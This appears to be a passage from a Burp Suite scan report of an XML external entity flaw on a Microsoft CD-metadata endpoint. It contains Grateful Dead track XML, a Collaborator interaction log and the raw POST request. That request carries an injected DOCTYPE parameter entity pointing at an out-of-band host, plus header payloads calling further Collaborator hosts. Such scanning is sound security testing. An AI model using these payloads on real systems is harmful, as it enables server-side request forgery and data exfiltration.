<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>7</trackNumber>
<filename>3-07 Samson and Delilah.m4a</filename>
<trackDuration>467348</trackDuration>
<bitrate>279320</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>22</trackRequestID>
</track>
<track>
<title>
<text>Tennessee Jed</text>
<word>Tennessee</word>
<word>Jed</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>8</trackNumber>
<filename>1-08 Tennessee Jed.m4a</filename>
<trackDuration>470366</trackDuration>
<bitrate>268080</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>7</trackRequestID>
</track>
<track>
<title>
<text>Eyes of the World</text>
<word>Eyes</word>
<word>of</word>
<word>the</word>
<word>World</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>8</trackNumber>
<filename>3-08 Eyes of the World.m4a</filename>
<trackDuration>1410078</trackDuration>
<bitrate>276416</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>23</trackRequestID>
</track>
<track>
<title>
<text>The Music Never Stopped</text>
<word>The</word>
<word>Music</word>
<word>Never</word>
<word>Stopped</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>9</trackNumber>
<filename>1-09 The Music Never Stopped.m4a</filename>
<trackDuration>498718</trackDuration>
<bitrate>273520</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>8</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Collaborator HTTP interaction

The Collaborator server received an HTTP request.

The request was received from IP address 157.56.59.219 at 2017-Sep-03 23:38:02 UTC.

Request to Collaborator

GET / HTTP/1.1
Host: svruvlsxgjgu9zr7qjxceap7zy5pvdt1ks7iv7.burpcollaborator.net
Connection: Keep-Alive

Response from Collaborator

3.4. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [request body]
Previous Next

Summary

	Severity:	High
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Issue detail

It is possible to induce the application to perform server-side HTTP requests to arbitrary domains. The tag <!DOCTYPE metadata [<!ENTITY % acxvk SYSTEM "http://0ef2etb5zrz2s7af9rgkxi8fi6oxeld940rqff.burpcollaborator.net">%acxvk; ]><METADATA>[0x0d][0x0a] <MDQ-CD>[0x0d][0x0a] <mdqRequestID>CBE2B824-3137-46F9-BB77-34691DDF35AC</mdqRequestID>[0x0d][0x0a] <album>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Dick's Picks, Vol. 17: Boston Garden, Boston, MA 9/25/91</text>[0x0d][0x0a] <word>Dicks</word>[0x0d][0x0a] <word>Picks</word>[0x0d][0x0a] <word>Vol</word>[0x0d][0x0a] <word>17</word>[0x0d][0x0a] <word>Boston</word>[0x0d][0x0a] <word>Garden</word>[0x0d][0x0a] <word>Boston</word>[0x0d][0x0a] <word>MA</word>[0x0d][0x0a] <word>9</word>[0x0d][0x0a] <word>25</word>[0x0d][0x0a] <word>91</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] </album>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Help On the Way</text>[0x0d][0x0a] <word>Help</word>[0x0d][0x0a] <word>On</word>[0x0d][0x0a] <word>the</word>[0x0d][0x0a] <word>Way</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>1</trackNumber>[0x0d][0x0a] <filename>1-01 Help On the Way.m4a</filename>[0x0d][0x0a] <trackDuration>255326</trackDuration>[0x0d][0x0a] <bitrate>302064</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>0</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Victim or the Crime</text>[0x0d][0x0a] <word>Victim</word>[0x0d][0x0a] <word>or</word>[0x0d][0x0a] <word>the</word>[0x0d][0x0a] <word>Crime</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>1</trackNumber>[0x0d][0x0a] <filename>2-01 Victim or the Crime.m4a</filename>[0x0d][0x0a] <trackDuration>505010</trackDuration>[0x0d][0x0a] <bitrate>277032</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>9</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>That Would Be Something</text>[0x0d][0x0a] <word>That</word>[0x0d][0x0a] <word>Would</word>[0x0d][0x0a] <word>Be</word>[0x0d][0x0a] <word>Something</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>1</trackNumber>[0x0d][0x0a] <filename>3-01 That Would Be Something.m4a</filename>[0x0d][0x0a] <trackDuration>231526</trackDuration>[0x0d][0x0a] <bitrate>267560</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>16</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Slipknot!</text>[0x0d][0x0a] <word>Slipknot</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>2</trackNumber>[0x0d][0x0a] <filename>1-02 Slipknot!.m4a</filename>[0x0d][0x0a] <trackDuration>330466</trackDuration>[0x0d][0x0a] <bitrate>277496</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>1</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Crazy Fingers</text>[0x0d][0x0a] <word>Crazy</word>[0x0d][0x0a] <word>Fingers</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>2</trackNumber>[0x0d][0x0a] <filename>2-02 Crazy Fingers.m4a</filename>[0x0d][0x0a] <trackDuration>578919</trackDuration>[0x0d][0x0a] <bitrate>270592</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>10</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Playing In the Band</text>[0x0d][0x0a] <word>Playing</word>[0x0d][0x0a] <word>In</word>[0x0d][0x0a] <word>the</word>[0x0d][0x0a] <word>Band</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>2</trackNumber>[0x0d][0x0a] <filename>3-02 Playing In the Band.m4a</filename>[0x0d][0x0a] <trackDuration>323616</trackDuration>[0x0d][0x0a] <bitrate>283784</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>17</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Franklin's Tower</text>[0x0d][0x0a] <word>Franklins</word>[0x0d][0x0a] <word>Tower</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>3</trackNumber>[0x0d][0x0a] <filename>1-03 Franklin's Tower.m4a</filename>[0x0d][0x0a] <trackDuration>641660</trackDuration>[0x0d][0x0a] <bitrate>277072</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>2</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Playing In the Band</text>[0x0d][0x0a] <word>Playing</word>[0x0d][0x0a] <word>In</word>[0x0d][0x0a] <word>the</word>[0x0d][0x0a] <word>Band</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>3</trackNumber>[0x0d][0x0a] <filename>2-03 Playing In the Band.m4a</filename>[0x0d][0x0a] <trackDuration>562642</trackDuration>[0x0d][0x0a] <bitrate>281312</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>11</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>China Doll</text>[0x0d][0x0a] <word>China</word>[0x0d][0x0a] <word>Doll</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>3</trackNumber>[0x0d][0x0a] <filename>3-03 China Doll.m4a</filename>[0x0d][0x0a] <trackDuration>347022</trackDuration>[0x0d][0x0a] <bitrate>264424</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>18</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Walkin' Blues</text>[0x0d][0x0a] <word>Walkin</word>[0x0d][0x0a] <word>Blues</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>4</trackNumber>[0x0d][0x0a] <filename>1-04 Walkin' Blues.m4a</filename>[0x0d][0x0a] <trackDuration>390884</trackDuration>[0x0d][0x0a] <bitrate>274608</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>3</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Terrapin Station</text>[0x0d][0x0a] <word>Terrapin</word>[0x0d][0x0a] <word>Station</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>4</trackNumber>[0x0d][0x0a] <filename>2-04 Terrapin Station.m4a</filename>[0x0d][0x0a] <trackDuration>767930</trackDuration>[0x0d][0x0a] <bitrate>271168</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>12</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Throwing Stones</text>[0x0d][0x0a] <word>Throwing</word>[0x0d][0x0a] <word>Stones</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>4</trackNumber>[0x0d][0x0a] <filename>3-04 Throwing Stones.m4a</filename>[0x0d][0x0a] <trackDuration>539469</trackDuration>[0x0d][0x0a] <bitrate>276512</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>19</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>It Must Have Been the Roses</text>[0x0d][0x0a] <word>It</word>[0x0d][0x0a] <word>Must</word>[0x0d][0x0a] <word>Have</word>[0x0d][0x0a] <word>Been</word>[0x0d][0x0a] <word>the</word>[0x0d][0x0a] <word>Roses</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>5</trackNumber>[0x0d][0x0a] <filename>1-05 It Must Have Been the Roses.m4a</filename>[0x0d][0x0a] <trackDuration>345977</trackDuration>[0x0d][0x0a] <bitrate>263432</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>4</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Boston Clam Jam</text>[0x0d][0x0a] <word>Boston</word>[0x0d][0x0a] <word>Clam</word>[0x0d][0x0a] <word>Jam</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>5</trackNumber>[0x0d][0x0a] <filename>2-05 Boston Clam Jam.m4a</filename>[0x0d][0x0a] <trackDuration>337409</trackDuration>[0x0d][0x0a] <bitrate>274216</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>13</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Not Fade Away</text>[0x0d][0x0a] <word>Not</word>[0x0d][0x0a] <word>Fade</word>[0x0d][0x0a] <word>Away</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>5</trackNumber>[0x0d][0x0a] <filename>3-05 Not Fade Away.m4a</filename>[0x0d][0x0a] <trackDuration>541791</trackDuration>[0x0d][0x0a] <bitrate>262816</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>20</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Dire Wolf</text>[0x0d][0x0a] <word>Dire</word>[0x0d][0x0a] <word>Wolf</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>6</trackNumber>[0x0d][0x0a] <filename>1-06 Dire Wolf.m4a</filename>[0x0d][0x0a] <trackDuration>239653</trackDuration>[0x0d][0x0a] <bitrate>263096</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>5</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Drums</text>[0x0d][0x0a] <word>Drums</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>6</trackNumber>[0x0d][0x0a] <filename>2-06 Drums.m4a</filename>[0x0d][0x0a] <trackDuration>664764</trackDuration>[0x0d][0x0a] <bitrate>265960</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>14</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>The Mighty Quinn</text>[0x0d][0x0a] <word>The</word>[0x0d][0x0a] <word>Mighty</word>[0x0d][0x0a] <word>Quinn</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>6</trackNumber>[0x0d][0x0a] <filename>3-06 The Mighty Quinn.m4a</filename>[0x0d][0x0a] <trackDuration>281054</trackDuration>[0x0d][0x0a] <bitrate>263256</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>21</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Queen Jane Approximately</text>[0x0d][0x0a] <word>Queen</word>[0x0d][0x0a] <word>Jane</word>[0x0d][0x0a] <word>Approximately</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>7</trackNumber>[0x0d][0x0a] <filename>1-07 Queen Jane Approximately.m4a</filename>[0x0d][0x0a] <trackDuration>436883</trackDuration>[0x0d][0x0a] <bitrate>269672</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>6</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Space</text>[0x0d][0x0a] <word>Space</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>7</trackNumber>[0x0d][0x0a] <filename>2-07 Space.m4a</filename>[0x0d][0x0a] <trackDuration>495537</trackDuration>[0x0d][0x0a] <bitrate>261064</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>15</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Samson and Delilah</text>[0x0d][0x0a] <word>Samson</word>[0x0d][0x0a] <word>and</word>[0x0d][0x0a] <word>Delilah</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>7</trackNumber>[0x0d][0x0a] <filename>3-07 Samson and Delilah.m4a</filename>[0x0d][0x0a] <trackDuration>467348</trackDuration>[0x0d][0x0a] <bitrate>279320</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>22</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Tennessee Jed</text>[0x0d][0x0a] <word>Tennessee</word>[0x0d][0x0a] <word>Jed</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>8</trackNumber>[0x0d][0x0a] <filename>1-08 Tennessee Jed.m4a</filename>[0x0d][0x0a] <trackDuration>470366</trackDuration>[0x0d][0x0a] <bitrate>268080</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>7</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Eyes of the World</text>[0x0d][0x0a] <word>Eyes</word>[0x0d][0x0a] <word>of</word>[0x0d][0x0a] <word>the</word>[0x0d][0x0a] <word>World</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>8</trackNumber>[0x0d][0x0a] <filename>3-08 Eyes of the World.m4a</filename>[0x0d][0x0a] <trackDuration>1410078</trackDuration>[0x0d][0x0a] <bitrate>276416</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>23</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>The Music Never Stopped</text>[0x0d][0x0a] <word>The</word>[0x0d][0x0a] <word>Music</word>[0x0d][0x0a] <word>Never</word>[0x0d][0x0a] <word>Stopped</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>9</trackNumber>[0x0d][0x0a] <filename>1-09 The Music Never Stopped.m4a</filename>[0x0d][0x0a] <trackDuration>498718</trackDuration>[0x0d][0x0a] <bitrate>273520</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>8</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] </MDQ-CD>[0x0d][0x0a]</METADATA>[0x0d][0x0a] was injected into the XML sent to the server. This payload defines an XML parameter entity within a doctype that references a URL on an external domain.

The application performed an HTTP request to the specified domain, indicating that the XML parser processed the injected parameter entity within the doctype definition.

Remediation detail

Request

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=CBE2B824-3137-46F9-BB77-34691DDF35AC HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@ksgtitxhft9mh2ymxcuykq39f0lwdx1m.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 17015
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://0gh969lx39x25im2lsie86rp3g9c15pu.burpcollaborator.net/ref
X-Real-IP: spoofed.zwz8m81wj8d1lh211rydo57ojfpbh55u.burpcollaborator.net
Forwarded: for=spoofed.rrm0h0woe08tg9xtwjt5jx2ge7k3cy0n.burpcollaborator.net;by=spoofed.rrm0h0woe08tg9xtwjt5jx2ge7k3cy0n.burpcollaborator.net;host=spoofed.rrm0h0woe08tg9xtwjt5jx2ge7k3cy0n.burpcollaborator.net
X-Forwarded-For: spoofed.iqcrgrvfdr7kf0wkvaswio17dyjubqzf.burpcollaborator.net
Contact: root@hrcqhqweeq8jgzxjw9tvjn26exktcq0f.burpcollaborator.net
From: root@s0t1q15pn1hupa6u5k26sybhn8t4l29r.burpcollaborator.net
True-Client-IP: spoofed.t1v2r26qo2ivqb7v6l37tzcio9u5m4at.burpcollaborator.net
X-Wap-Profile: http://c0dlql59nlhepu6e542qsib1nstolo9d.burpcollaborator.net/wap.xml
Client-ip: spoofed.x646w6but6nzvfczbp8by3hmtdz9rbf0.burpcollaborator.net

<!DOCTYPE metadata [<!ENTITY % acxvk SYSTEM "http://0ef2etb5zrz2s7af9rgkxi8fi6oxeld940rqff.burpcollaborator.net">%acxvk; ]><METADATA>
<MDQ-CD>
<mdqRequestID>CBE2B824-3137-46F9-BB77-34691DDF35AC</mdqRequestID>
<album>
<title>
<text>Dick's Picks, Vol. 17: Boston Garden, Boston, MA 9/25/91</text>
<word>Dicks</word>
<word>Picks</word>
<word>Vol</word>
<word>17</word>
<word>Boston</word>
<word>Garden</word>
<word>Boston</word>
<word>MA</word>
<word>9</word>
<word>25</word>
<word>91</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
</album>
<track>
<title>
<text>Help On the Way</text>
<word>Help</word>
<word>On</word>
<word>the</word>
<word>Way</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>1</trackNumber>
<filename>1-01 Help On the Way.m4a</filename>
<trackDuration>255326</trackDuration>
<bitrate>302064</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
<track>
<title>
<text>Victim or the Crime</text>
<word>Victim</word>
<word>or</word>
<word>the</word>
<word>Crime</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>1</trackNumber>
<filename>2-01 Victim or the Crime.m4a</filename>
<trackDuration>505010</trackDuration>
<bitrate>277032</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>9</trackRequestID>
</track>
<track>
<title>
<text>That Would Be Something</text>
<word>That</word>
<word>Would</word>
<word>Be</word>
<word>Something</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>1</trackNumber>
<filename>3-01 That Would Be Something.m4a</filename>
<trackDuration>231526</trackDuration>
<bitrate>267560</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>16</trackRequestID>
</track>
<track>
<title>
<text>Slipknot!</text>
<word>Slipknot</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>2</trackNumber>
<filename>1-02 Slipknot!.m4a</filename>
<trackDuration>330466</trackDuration>
<bitrate>277496</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>1</trackRequestID>
</track>
<track>
<title>
<text>Crazy Fingers</text>
<word>Crazy</word>
<word>Fingers</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>2</trackNumber>
<filename>2-02 Crazy Fingers.m4a</filename>
<trackDuration>578919</trackDuration>
<bitrate>270592</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>10</trackRequestID>
</track>
<track>
<title>
<text>Playing In the Band</text>
<word>Playing</word>
<word>In</word>
<word>the</word>
<word>Band</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>2</trackNumber>
<filename>3-02 Playing In the Band.m4a</filename>
<trackDuration>323616</trackDuration>
<bitrate>283784</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>17</trackRequestID>
</track>
<track>
<title>
<text>Franklin's Tower</text>
<word>Franklins</word>
<word>Tower</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>3</trackNumber>
<filename>1-03 Franklin's Tower.m4a</filename>
<trackDuration>641660</trackDuration>
<bitrate>277072</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>2</trackRequestID>
</track>
<track>
<title>
<text>Playing In the Band</text>
<word>Playing</word>
<word>In</word>
<word>the</word>
<word>Band</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>3</trackNumber>
<filename>2-03 Playing In the Band.m4a</filename>
<trackDuration>562642</trackDuration>
<bitrate>281312</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>11</trackRequestID>
</track>
<track>
<title>
<text>China Doll</text>
<word>China</word>
<word>Doll</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>3</trackNumber>
<filename>3-03 China Doll.m4a</filename>
<trackDuration>347022</trackDuration>
<bitrate>264424</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>18</trackRequestID>
</track>
<track>
<title>
<text>Walkin' Blues</text>
<word>Walkin</word>
<word>Blues</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>4</trackNumber>
<filename>1-04 Walkin' Blues.m4a</filename>
<trackDuration>390884</trackDuration>
<bitrate>274608</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>3</trackRequestID>
</track>
<track>
<title>
<text>Terrapin Station</text>
<word>Terrapin</word>
<word>Station</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>4</trackNumber>
<filename>2-04 Terrapin Station.m4a</filename>
<trackDuration>767930</trackDuration>
<bitrate>271168</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>12</trackRequestID>
</track>
<track>
<title>
